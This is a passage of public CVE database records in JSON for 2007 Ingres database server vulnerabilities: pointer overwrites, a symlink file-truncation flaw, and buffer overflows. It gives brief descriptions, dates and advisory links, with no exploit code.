"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3336",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-unspecified-code-execution(34993)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
},
{
"name": "ingres-pointer-code-execution(35000)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
},
{
"name": "37486",
"refsource": "OSVDB",
"url": "http://osvdb.org/37486"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 1",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
},
{
"name": "20070625 Ingres Unauthenticated Pointer Overwrite 2",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
},
{
"name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
},
{
"name": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3336",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3337 (GCVE-0-2007-3337)
Vulnerability from cvelistv5 – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
| URL | Tags |
|---|---|
| http://www.vupen.com/english/advisories/2007/2288 | vdb-entryx_refsource_VUPEN |
| http://www.ca.com/us/securityadvisor/newsinfo/col… | x_refsource_CONFIRM |
| http://secunia.com/advisories/25756 | third-party-advisoryx_refsource_SECUNIA |
| http://secunia.com/advisories/25775 | third-party-advisoryx_refsource_SECUNIA |
| http://www.vupen.com/english/advisories/2007/2290 | vdb-entryx_refsource_VUPEN |
| http://supportconnectw.ca.com/public/ca_common_do… | x_refsource_CONFIRM |
| http://www.ngssoftware.com/advisories/medium-risk… | x_refsource_MISC |
| http://osvdb.org/37485 | vdb-entryx_refsource_OSVDB |
| http://www.securityfocus.com/archive/1/472200/100… | mailing-listx_refsource_BUGTRAQ |
| http://www.ca.com/us/securityadvisor/vulninfo/vul… | x_refsource_CONFIRM |
| http://www.securityfocus.com/bid/24585 | vdb-entryx_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.867Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3337",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-file-truncation/"
},
{
"name": "37485",
"refsource": "OSVDB",
"url": "http://osvdb.org/37485"
},
{
"name": "20070625 Ingres wakeup setuid(ingres) file truncation",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472200/100/0/threaded"
},
{
"name": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3337",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.867Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3338 (GCVE-0-2007-3338)
Vulnerability from cvelistv5 – Published: 2007-06-22 18:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.888Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3338",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20070625 Ingres verifydb local stack overflow",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472194/100/0/threaded"
},
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "ingres-uuidfromchar-bo(34995)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34995"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "ingres-duvegetargs-bo(34998)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34998"
},
{
"name": "20070625 Ingres stack overflow in uuid_from_char function",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/472197/100/0/threaded"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/",
"refsource": "MISC",
"url": "http://www.ngssoftware.com/advisories/medium-risk-vulnerability-in-ingres-stack-overflow/"
},
{
"name": "37483",
"refsource": "OSVDB",
"url": "http://osvdb.org/37483"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3338",
"datePublished": "2007-06-22T18:00:00.000Z",
"dateReserved": "2007-06-21T00:00:00.000Z",
"dateUpdated": "2024-08-07T14:14:12.888Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3334 (GCVE-0-2007-3334)
Vulnerability from cvelistv5 – Published: 2007-06-21 22:00 – Updated: 2024-08-07 14:14- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:14:12.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE",
"x_transferred"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-21T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2288",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24585"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3334",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2288",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2288"
},
{
"name": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778",
"refsource": "CONFIRM",
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
},
{
"name": "20070621 Ingres Database Multiple Heap Corruption Vulnerabilities",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
},
{
"name": "ingres-wakeup-privilege-escalation(35002)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35002"
},
{
"name": "25756",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25756"
},
{
"name": "25775",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25775"
},
{
"name": "37488",
"refsource": "OSVDB",
"url": "http://osvdb.org/37488"
},
{
"name": "ADV-2007-2290",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2290"
},
{
"name": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp",
"refsource": "CONFIRM",
"url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
},
{
"name": "ingres-communications-server-bo(34991)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34991"
},
{
"name": "37487",
"refsource": "OSVDB",
"url": "http://osvdb.org/37487"
},
{
"name": "1018278",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018278"
},
{
"name": "ingres-data-access-server-bo(34992)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34992"
},
{
"name": "24585",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24585"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3334",
